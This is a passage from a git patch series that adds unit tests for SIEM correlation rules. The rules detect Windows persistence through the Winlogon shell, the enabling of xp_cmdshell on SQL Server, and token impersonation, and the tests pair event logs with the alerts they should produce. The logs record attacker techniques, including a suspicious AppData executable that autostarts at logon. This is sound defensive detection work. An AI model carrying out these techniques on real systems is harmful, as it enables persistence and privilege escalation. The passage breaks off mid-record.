Logon Autostart Execution", "category.low": "Winlogon Helper DLL", "correlation_name": "Use_persist_Start_process_via_WinlogonShell", "correlation_type": "incident", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Use_persist_Start_process_via_WinlogonShell|iewin7|synthetic:ieuser@iewin7", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "process", "object.account.domain": "iewin7", "object.account.id": "synthetic:ieuser@iewin7", "object.account.name": "ieuser", "object.account.session_id": "770067", "object.process.cmdline": "\"C:\\Users\\IEUser\\AppData\\Roaming\\9QxTsAU9w8gyPj4w\\BRE6BgE2JubB.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\users\\ieuser\\appdata\\roaming\\9qxtsau9w8gypj4w\\bre6bge2jubb.exe", "object.process.hash.md5": "41CE32C0D1D4E5BB8C63674F317450EF", "object.process.hash.sha1": "E2286C233467D0E164ED5ED1D07BAC9F90F74D19", "object.process.hash.sha256": "5DE788D23B247B29F116CD0583280CE10A429E9F8C1D80C42DEAB20C6F4DBB4E", "object.process.id": "3444", "object.process.meta": "Description:NpmTaskRunner | Product:NpmTaskRunner | Company:", "object.process.name": "bre6bge2jubb.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\userinit.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\userinit.exe", "object.process.parent.id": "3448", "object.process.parent.name": "userinit.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\users\\ieuser\\appdata\\roaming\\9qxtsau9w8gypj4w\\", "object.process.version": "1.0.0.0", "status": "success", "subject": "process", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "770067"} \ No newline at end of file diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_persist/Use_persist_Start_process_via_WinlogonShell/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_persist/Use_persist_Start_process_via_WinlogonShell/tests/test_2.sc new file mode 100644 index 00000000..fdbedd00 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_persist/Use_persist_Start_process_via_WinlogonShell/tests/test_2.sc @@ -0,0 +1,4 @@ +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4688\",\"Version\":\"2\",\"Level\":\"0\",\"Task\":\"13312\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-02T12:19:09.7649521Z\"},\"EventRecordID\":\"25858687\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"8048\"},\"Channel\":\"Security\",\"Computer\":\"win10-work.stand2008.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-3800063338-4262557262-2801230003-500\"},{\"Name\":\"SubjectUserName\",\"text\":\"Администратор\"},{\"Name\":\"SubjectDomainName\",\"text\":\"STAND2008\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x1bb77ac\"},{\"Name\":\"NewProcessId\",\"text\":\"0x21b0\"},{\"Name\":\"NewProcessName\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"TokenElevationType\",\"text\":\"%%1936\"},{\"Name\":\"ProcessId\",\"text\":\"0x25fc\"},{\"Name\":\"CommandLine\",\"text\":\"c:\\\\windows\\\\system32\\\\cmd.exe\"},{\"Name\":\"TargetUserSid\",\"text\":\"S-1-0-0\"},{\"Name\":\"TargetUserName\",\"text\":\"-\"},{\"Name\":\"TargetDomainName\",\"text\":\"-\"},{\"Name\":\"TargetLogonId\",\"text\":\"0x0\"},{\"Name\":\"ParentProcessName\",\"text\":\"C:\\\\Windows\\\\System32\\\\userinit.exe\"},{\"Name\":\"MandatoryLabel\",\"text\":\"S-1-16-12288\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "event_src.category": "Operating system", "event_src.fqdn": "win10-work.stand2008.local", "event_src.host": "win10-work.stand2008.local", "event_src.hostname": "win10-work", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4688_A_new_process_has_been_created", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4688", "normalized": true, "object": "process", "object.account.domain": "stand2008", "object.account.id": "S-1-5-21-3800063338-4262557262-2801230003-500", "object.account.name": "администратор", "object.account.session_id": "29063084", "object.process.cmdline": "c:\\windows\\system32\\cmd.exe", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.id": "8624", "object.process.name": "cmd.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\userinit.exe", "object.process.parent.id": "9724", "object.process.parent.name": "userinit.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T13:32:35.846Z", "status": "success", "subject": "account", "subject.account.domain": "stand2008", "subject.account.id": "S-1-5-21-3800063338-4262557262-2801230003-500", "subject.account.name": "администратор", "subject.account.privileges": "TokenElevationTypeDefault", "subject.account.session_id": "29063084", "subject.state": "on behalf of oneself", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-06-02T12:19:09.764Z", "type": "raw", "uuid": "16f6ac42-1656-4eb3-9f55-a3a4968856b1"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "start", "category.generic": "Persistence", "category.high": "Boot or Logon Autostart Execution", "category.low": "Winlogon Helper DLL", "correlation_name": "Use_persist_Start_process_via_WinlogonShell", "correlation_type": "incident", "event_src.fqdn": "win10-work.stand2008.local", "event_src.host": "win10-work.stand2008.local", "event_src.hostname": "win10-work", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Use_persist_Start_process_via_WinlogonShell|win10-work.stand2008.local|s-1-5-21-3800063338-4262557262-2801230003-500", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "process", "object.account.domain": "stand2008", "object.account.id": "S-1-5-21-3800063338-4262557262-2801230003-500", "object.account.name": "администратор", "object.account.session_id": "29063084", "object.process.cmdline": "c:\\windows\\system32\\cmd.exe", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.id": "8624", "object.process.name": "cmd.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\userinit.exe", "object.process.parent.id": "9724", "object.process.parent.name": "userinit.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "status": "success", "subject": "process", "subject.account.domain": "stand2008", "subject.account.id": "S-1-5-21-3800063338-4262557262-2801230003-500", "subject.account.name": "администратор", "subject.account.privileges": "TokenElevationTypeDefault", "subject.account.session_id": "29063084"} From 07d2947840db063262e045040049af5753e56877 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Tue, 1 Aug 2023 12:45:54 +0300 Subject: [PATCH 46/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?= =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(XP=5FCmd?= =?UTF-8?q?shell=5FEnable)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../mitre_attck_persist/XP_Cmdshell_Enable/tests/test_1.sc | 4 ++++ .../mitre_attck_persist/XP_Cmdshell_Enable/tests/test_2.sc | 5 +++++ 2 files changed, 9 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_persist/XP_Cmdshell_Enable/tests/test_1.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_persist/XP_Cmdshell_Enable/tests/test_2.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_persist/XP_Cmdshell_Enable/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_persist/XP_Cmdshell_Enable/tests/test_1.sc new file mode 100644 index 00000000..df9cf690 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_persist/XP_Cmdshell_Enable/tests/test_1.sc @@ -0,0 +1,4 @@ +{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"MSSQLSERVER\"},\"EventID\":{\"Qualifiers\":\"16384\",\"text\":\"15457\"},\"Level\":\"4\",\"Task\":\"2\",\"Keywords\":\"0x80000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-11-04T09:27:26.1586215Z\"},\"EventRecordID\":\"9692\",\"Channel\":\"Application\",\"Computer\":\"MSEDGEWIN10\",\"Security\":\"\"},\"EventData\":{\"Data\":[\"xp_cmdshell\",\"0\",\"1\"],\"Binary\":\"613C00000A0000000C0000004D0053004500440047004500570049004E00310030000000070000006D00610073007400650072000000\"}}}", "event_src.category": "Database server", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Application", "event_src.title": "sql_server", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_SQL_Server_eventlog_15457_Parameter_enabled", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "15457", "normalized": true, "object": "configuration", "object.property": "parameter", "object.value": "xp_cmdshell", "reason": "parameter enabled", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-05T11:07:51.676Z", "status": "success", "subject": "account", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-11-04T09:27:26.158Z", "type": "raw", "uuid": "ec2cc867-431a-4238-9d69-8e4720b3f22d"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "modify", "alert.key": "msedgewin10|xp_cmdshell", "category.generic": "Attack", "category.high": "Persistence", "category.low": "Server Software Component: SQL Stored Procedures", "correlation_name": "XP_Cmdshell_Enable", "correlation_type": "event", "event_src.category": "Database server", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Application", "event_src.title": "sql_server", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "XP_Cmdshell_Enable|msedgewin10", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "configuration", "object.property": "parameter", "object.value": "xp_cmdshell", "reason": "parameter enabled", "status": "success", "subject": "account"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_persist/XP_Cmdshell_Enable/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_persist/XP_Cmdshell_Enable/tests/test_2.sc new file mode 100644 index 00000000..5824c8bc --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_persist/XP_Cmdshell_Enable/tests/test_2.sc @@ -0,0 +1,5 @@ +{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"MSSQLSERVER\"},\"EventID\":{\"Qualifiers\":\"16384\",\"text\":\"15457\"},\"Level\":\"4\",\"Task\":\"2\",\"Keywords\":\"0x80000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-11-04T09:27:26.1430643Z\"},\"EventRecordID\":\"9691\",\"Channel\":\"Application\",\"Computer\":\"MSEDGEWIN10\",\"Security\":\"\"},\"EventData\":{\"Data\":[\"show advanced options\",\"0\",\"1\"],\"Binary\":\"613C00000A0000000C0000004D0053004500440047004500570049004E00310030000000070000006D00610073007400650072000000\"}}}", "event_src.category": "Database server", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Application", "event_src.title": "sql_server", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_SQL_Server_eventlog_15457_Parameter_enabled", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "15457", "normalized": true, "object": "configuration", "object.property": "parameter", "object.value": "show advanced options", "reason": "parameter enabled", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-05T11:14:13.158Z", "status": "success", "subject": "account", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-11-04T09:27:26.143Z", "type": "raw", "uuid": "f410f722-fa48-492a-bcb9-f6c57a09dfdf"} +{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"MSSQLSERVER\"},\"EventID\":{\"Qualifiers\":\"16384\",\"text\":\"15457\"},\"Level\":\"4\",\"Task\":\"2\",\"Keywords\":\"0x80000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-11-04T09:27:26.1586215Z\"},\"EventRecordID\":\"9692\",\"Channel\":\"Application\",\"Computer\":\"MSEDGEWIN10\",\"Security\":\"\"},\"EventData\":{\"Data\":[\"xp_cmdshell\",\"0\",\"1\"],\"Binary\":\"613C00000A0000000C0000004D0053004500440047004500570049004E00310030000000070000006D00610073007400650072000000\"}}}", "event_src.category": "Database server", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Application", "event_src.title": "sql_server", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_SQL_Server_eventlog_15457_Parameter_enabled", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "15457", "normalized": true, "object": "configuration", "object.property": "parameter", "object.value": "xp_cmdshell", "reason": "parameter enabled", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-05T11:14:13.159Z", "status": "success", "subject": "account", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-11-04T09:27:26.158Z", "type": "raw", "uuid": "016623b1-bda5-4f2c-8fba-baaaa3b80ecb"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "modify", "alert.context": "previously show advanced options was enabled", "alert.key": "msedgewin10|xp_cmdshell", "category.generic": "Attack", "category.high": "Persistence", "category.low": "Server Software Component: SQL Stored Procedures", "correlation_name": "XP_Cmdshell_Enable", "correlation_type": "event", "event_src.category": "Database server", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Application", "event_src.title": "sql_server", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "XP_Cmdshell_Enable|msedgewin10", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "configuration", "object.property": "parameter", "object.value": "xp_cmdshell", "reason": "parameter enabled", "status": "success", "subject": "account"} From 676676e04182a828de64d5fa87a4e2d81e9f3c3f Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Wed, 2 Aug 2023 10:21:03 +0300 Subject: [PATCH 47/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?= =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(=20Creat?= =?UTF-8?q?eProcessAsUser=5FImpersonation)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../CreateProcessAsUser_Impersonation/tests/test_1.sc | 5 +++++ .../CreateProcessAsUser_Impersonation/tests/test_2.sc | 5 +++++ 2 files changed, 10 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/CreateProcessAsUser_Impersonation/tests/test_1.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/CreateProcessAsUser_Impersonation/tests/test_2.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/CreateProcessAsUser_Impersonation/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/CreateProcessAsUser_Impersonation/tests/test_1.sc new file mode 100644 index 00000000..c9f15927 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/CreateProcessAsUser_Impersonation/tests/test_1.sc @@ -0,0 +1,5 @@ +{"action": "elevate", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4624\",\"Version\":\"2\",\"Level\":\"0\",\"Task\":\"12544\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-09-15T18:04:39.9871239Z\"},\"EventRecordID\":\"161473\",\"Correlation\":{\"ActivityID\":\"{c5412e82-8bc5-0000-0a2f-41c5c58bd601}\"},\"Execution\":{\"ProcessID\":\"644\",\"ThreadID\":\"5436\"},\"Channel\":\"Security\",\"Computer\":\"MSEDGEWIN10\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-3461203602-4096304019-2269080069-1009\"},{\"Name\":\"SubjectUserName\",\"text\":\"svc01\"},{\"Name\":\"SubjectDomainName\",\"text\":\"MSEDGEWIN10\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x10b6b3\"},{\"Name\":\"TargetUserSid\",\"text\":\"S-1-5-21-3461203602-4096304019-2269080069-1000\"},{\"Name\":\"TargetUserName\",\"text\":\"IEUser\"},{\"Name\":\"TargetDomainName\",\"text\":\"MSEDGEWIN10\"},{\"Name\":\"TargetLogonId\",\"text\":\"0x22afa1\"},{\"Name\":\"LogonType\",\"text\":\"3\"},{\"Name\":\"LogonProcessName\",\"text\":\"Advapi\"},{\"Name\":\"AuthenticationPackageName\",\"text\":\"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\"},{\"Name\":\"WorkstationName\",\"text\":\"MSEDGEWIN10\"},{\"Name\":\"LogonGuid\",\"text\":\"{00000000-0000-0000-0000-000000000000}\"},{\"Name\":\"TransmittedServices\",\"text\":\"-\"},{\"Name\":\"LmPackageName\",\"text\":\"-\"},{\"Name\":\"KeyLength\",\"text\":\"0\"},{\"Name\":\"ProcessId\",\"text\":\"0x140c\"},{\"Name\":\"ProcessName\",\"text\":\"C:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\"},{\"Name\":\"IpAddress\",\"text\":\"-\"},{\"Name\":\"IpPort\",\"text\":\"-\"},{\"Name\":\"ImpersonationLevel\",\"text\":\"%%1833\"},{\"Name\":\"RestrictedAdminMode\",\"text\":\"-\"},{\"Name\":\"TargetOutboundUserName\",\"text\":\"-\"},{\"Name\":\"TargetOutboundDomainName\",\"text\":\"-\"},{\"Name\":\"VirtualAccount\",\"text\":\"%%1843\"},{\"Name\":\"TargetLinkedLogonId\",\"text\":\"0x0\"},{\"Name\":\"ElevatedToken\",\"text\":\"%%1842\"}]}}}", "category.generic": "Account", "category.high": "Users And Rights Management", "category.low": "Manipulation", "chain_id": "c5412e82-8bc5-0000-0a2f-41c5c58bd601", "datafield6": "Network", "datafield9": "MICROSOFT_AUTHENTICATION_PACKAGE_V1_0", "dst.host": "msedgewin10", "dst.hostname": "msedgewin10", "event_src.category": "AAA", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4624_An_account_was_successfully_logged_on", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "logon_auth_method": "remote", "logon_service": "Advapi", "logon_type": 3, "mime": "application/x-pt-eventlog", "msgid": "4624", "normalized": true, "object": "account", "object.account.domain": "msedgewin10", "object.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1000", "object.account.name": "ieuser", "object.account.session_id": "2273185", "object.property": "session ID with ElevatedToken", "object.value": "0", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T10:55:20.773Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1009", "subject.account.name": "svc01", "subject.account.privileges": "local administrator rights", "subject.account.session_id": "1095347", "subject.process.fullpath": "c:\\windows\\system32\\inetsrv\\w3wp.exe", "subject.process.id": "5132", "subject.process.name": "w3wp.exe", "subject.process.path": "c:\\windows\\system32\\inetsrv\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-09-15T18:04:39.987Z", "type": "raw", "uuid": "829ce377-a5ed-431e-b00b-142f8a299ee5"} +{"action": "elevate", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4648\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12544\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-09-15T18:04:39.9870522Z\"},\"EventRecordID\":\"161472\",\"Correlation\":{\"ActivityID\":\"{c5412e82-8bc5-0000-0a2f-41c5c58bd601}\"},\"Execution\":{\"ProcessID\":\"644\",\"ThreadID\":\"5436\"},\"Channel\":\"Security\",\"Computer\":\"MSEDGEWIN10\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-3461203602-4096304019-2269080069-1009\"},{\"Name\":\"SubjectUserName\",\"text\":\"svc01\"},{\"Name\":\"SubjectDomainName\",\"text\":\"MSEDGEWIN10\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x10b6b3\"},{\"Name\":\"LogonGuid\",\"text\":\"{00000000-0000-0000-0000-000000000000}\"},{\"Name\":\"TargetUserName\",\"text\":\"IEUser\"},{\"Name\":\"TargetDomainName\",\"text\":\"MSEDGEWIN10\"},{\"Name\":\"TargetLogonGuid\",\"text\":\"{00000000-0000-0000-0000-000000000000}\"},{\"Name\":\"TargetServerName\",\"text\":\"localhost\"},{\"Name\":\"TargetInfo\",\"text\":\"localhost\"},{\"Name\":\"ProcessId\",\"text\":\"0x140c\"},{\"Name\":\"ProcessName\",\"text\":\"C:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\"},{\"Name\":\"IpAddress\",\"text\":\"-\"},{\"Name\":\"IpPort\",\"text\":\"-\"}]}}}", "category.generic": "Account", "category.high": "Users And Rights Management", "category.low": "Manipulation", "datafield6": "00000000-0000-0000-0000-000000000000", "datafield8": "00000000-0000-0000-0000-000000000000", "dst.host": "localhost", "dst.hostname": "localhost", "event_src.category": "AAA", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4648_A_logon_was_attempted_using_explicit_credentials", "importance": "medium", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4648", "normalized": true, "object": "account", "object.account.domain": "msedgewin10", "object.account.name": "ieuser", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T10:55:20.776Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1009", "subject.account.name": "svc01", "subject.account.session_id": "1095347", "subject.process.fullpath": "c:\\windows\\system32\\inetsrv\\w3wp.exe", "subject.process.id": "5132", "subject.process.name": "w3wp.exe", "subject.process.path": "c:\\windows\\system32\\inetsrv\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-09-15T18:04:39.987Z", "type": "raw", "uuid": "1a7d57e9-6488-4c0d-aca8-b2ac3e619852"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "elevate", "category.generic": "Attack", "category.high": "Privilege Escalation", "category.low": "Access Token Manipulation: Token Impersonation/Theft", "correlation_name": "CreateProcessAsUser_Impersonation", "correlation_type": "incident", "datafield9": "MICROSOFT_AUTHENTICATION_PACKAGE_V1_0", "dst.host": "localhost", "dst.hostname": "localhost", "event_src.category": "AAA", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "CreateProcessAsUser_Impersonation|msedgewin10|svc01|5132|ieuser", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "logon_auth_method": "remote", "logon_service": "Advapi", "logon_type": 3, "object": "account", "object.account.domain": "msedgewin10", "object.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1000", "object.account.name": "ieuser", "object.account.session_id": "2273185", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1009", "subject.account.name": "svc01", "subject.account.privileges": "local administrator rights", "subject.account.session_id": "1095347", "subject.process.fullpath": "c:\\windows\\system32\\inetsrv\\w3wp.exe", "subject.process.id": "5132", "subject.process.name": "w3wp.exe", "subject.process.path": "c:\\windows\\system32\\inetsrv\\"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/CreateProcessAsUser_Impersonation/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/CreateProcessAsUser_Impersonation/tests/test_2.sc new file mode 100644 index 00000000..7ff4848d --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/CreateProcessAsUser_Impersonation/tests/test_2.sc @@ -0,0 +1,5 @@ +{"action": "elevate", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4624\",\"Version\":\"2\",\"Level\":\"0\",\"Task\":\"12544\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-09-15T18:04:39.9871239Z\"},\"EventRecordID\":\"161473\",\"Correlation\":{\"ActivityID\":\"{c5412e82-8bc5-0000-0a2f-41c5c58bd601}\"},\"Execution\":{\"ProcessID\":\"644\",\"ThreadID\":\"5436\"},\"Channel\":\"Security\",\"Computer\":\"localhist\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-3461203602-4096304019-2269080069-1009\"},{\"Name\":\"SubjectUserName\",\"text\":\"svc01\"},{\"Name\":\"SubjectDomainName\",\"text\":\"MSEDGEWIN10\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x10b6b3\"},{\"Name\":\"TargetUserSid\",\"text\":\"S-1-5-21-3461203602-4096304019-2269080069-1000\"},{\"Name\":\"TargetUserName\",\"text\":\"IEUser\"},{\"Name\":\"TargetDomainName\",\"text\":\"MSEDGEWIN10\"},{\"Name\":\"TargetLogonId\",\"text\":\"0x22afa1\"},{\"Name\":\"LogonType\",\"text\":\"3\"},{\"Name\":\"LogonProcessName\",\"text\":\"Advapi\"},{\"Name\":\"AuthenticationPackageName\",\"text\":\"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\"},{\"Name\":\"WorkstationName\",\"text\":\"MSEDGEWIN10\"},{\"Name\":\"LogonGuid\",\"text\":\"{00000000-0000-0000-0000-000000000000}\"},{\"Name\":\"TransmittedServices\",\"text\":\"-\"},{\"Name\":\"LmPackageName\",\"text\":\"-\"},{\"Name\":\"KeyLength\",\"text\":\"0\"},{\"Name\":\"ProcessId\",\"text\":\"0x140c\"},{\"Name\":\"ProcessName\"